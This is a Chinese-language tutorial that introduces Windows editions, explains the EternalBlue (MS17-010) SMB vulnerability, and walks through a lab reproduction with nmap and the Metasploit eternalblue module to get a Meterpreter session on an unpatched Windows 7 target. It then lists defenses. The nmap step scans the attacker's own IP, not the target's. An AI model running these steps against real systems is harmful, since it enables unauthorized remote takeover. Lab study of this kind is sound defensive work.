是什么Windows操作系统
电脑的 “管家 + 翻译官 + 平台”
- 管硬件:CPU、内存、硬盘、显卡、键盘鼠标、显示器
- 管软件:让 QQ、浏览器、游戏、Office 能运行
- 给你界面:点图标、点菜单、拖窗口,而不是敲黑框命令
没有操作系统,电脑就是一堆不会动的硬件。
Windows 核心特点
- 图形界面友好:窗口、菜单、鼠标操作,易用性强,普通用户易上手。
- 兼容性极强:支持海量软件、游戏、外设驱动,生态最完善。
- 多任务多线程:可同时运行多个程序,稳定调度硬件资源。
- 软硬件生态庞大:办公、游戏、开发、工控等场景全覆盖。
- 闭源商业系统:由微软统一维护、更新与安全补丁。
- 面向普通用户与企业:兼顾家用娱乐、办公生产和企业服务器。
常见windows版本
Windows 专业版(桌面操作系统)
主要给个人、办公、开发、设计用,带图形界面、支持日常软件。
- Windows 11 专业版(Win11 Pro):最新专业版,界面现代化,支持更高硬件配置,适合新电脑办公 / 生产力。
- Windows 10 专业版(Win10 Pro):主流办公 / 开发版本,比家庭版多组策略、远程桌面、域加入功能。
- Windows 10 企业版 / LTSC:长期稳定版,无自动更新、无应用商店,工控、企业专用。
- Windows 7 专业版 / 旗舰版:经典老版本,兼容性极强,很多老企业、老软件仍在使用。
Windows 服务器版(Server 系统)
用于服务器、网站、数据库、云平台、企业内网,强调稳定、安全、后台服务。
- Windows Server 2008 / 2008 R2:经典老服务器系统,很多老旧企业服务器仍在运行。
- Windows Server 2012 / 2012 R2:稳定性强,广泛用于中小企业服务器。
- Windows Server 2016:开始强化云、容器、虚拟化,现代服务器常用版本。
- Windows Server 2019:安全性、性能大幅提升,目前企业主流。
- Windows Server 2022:最新服务器系统,云原生、安全更强,新服务器首选。
Windows系统的安全风险
“永恒之蓝”(MS17-010)安全事件
2017年震惊全球的重大网络安全事件,核心是NSA 泄露的 Windows SMB 漏洞被黑客利用,引发 WannaCry 勒索病毒全球大爆发。
- 漏洞本质:Windows SMBv1 协议远程代码执行漏洞(编号:CVE-2017-0144,微软补丁:MS17-010)。
- 来源:美国国家安全局(NSA) 开发的网络攻击武器,2017年4月被黑客组织影子经纪人(Shadow Brokers)公开泄露。
- 攻击入口:利用 Windows 默认开放的445 端口(文件共享),无需用户交互即可远程入侵。
- 影响系统:Windows XP/7/8、Server 2003/2008/2012 等未打补丁的旧版系统。
攻击场景复现
(以下过程只作为演示,均在靶机内实现,严谨未经授权私自攻击他人主机)
实验环境
攻击机:Kali Linux(IP:192.168.255.128需联⽹配置,安装 Metasploit 框架)
⽬标机:Windows 7 旗舰版(IP:192.168.255.122,开启 SMB 服务,未安装 MS17-010 补丁)
步骤解析
1.漏洞扫描:通过 nmap 脚本检测⽬标是否存在 MS17-010 漏洞
nmap –script smb-vuln* 192.168.255.128

若输出中显示"VULNERABLE",则确认⽬标存在该漏洞
2.启动 Metasploit 框架
msfconsole

3.搜索漏洞模块
search ms17-010

4.选择攻击模块并配置攻击信息
use exploit/windows/smb/ms17_010_eternalblue 选择永恒之蓝利⽤模块(输⼊对应序号也可)
set rhosts 192.168.255.122 设置⽬标机 IP
set lhost 192.168.255.128 设置攻击机 IP(Kali 本机 IP)

5.执行攻击
配置完毕输入run或exploit执⾏攻击

攻击成功后,将获得⽬标机的 Meterpreter 交互式会话
永恒之蓝(MS17-010)防御方法
1. 打补丁(最根本)
安装微软的 MS17-010 安全补丁
-
Win7 / 2008 / 2012 / 2016 都必须装
-
XP/2003 微软也出了紧急补丁,一定要打
2. 关闭 445 端口(最关键)
永恒之蓝就是走 445 端口 入侵的。关闭或防火墙禁止 445 入站,直接防住 99% 攻击。
3. 禁用 SMBv1 协议
永恒之蓝利用的是 SMBv1 漏洞。Win7 以上系统都可以安全禁用 SMBv1。
4. 不要乱插 U 盘、不乱点文件
永恒之蓝是蠕虫病毒,会通过局域网传播。
5. 开启防火墙
Windows 自带防火墙一定要开,默认会拦很多危险端口。
网络攻击、非法入侵均属违法行为,仅可在授权环境下学习研究。严守法律法规,树立安全意识,共同维护网络安全!!!




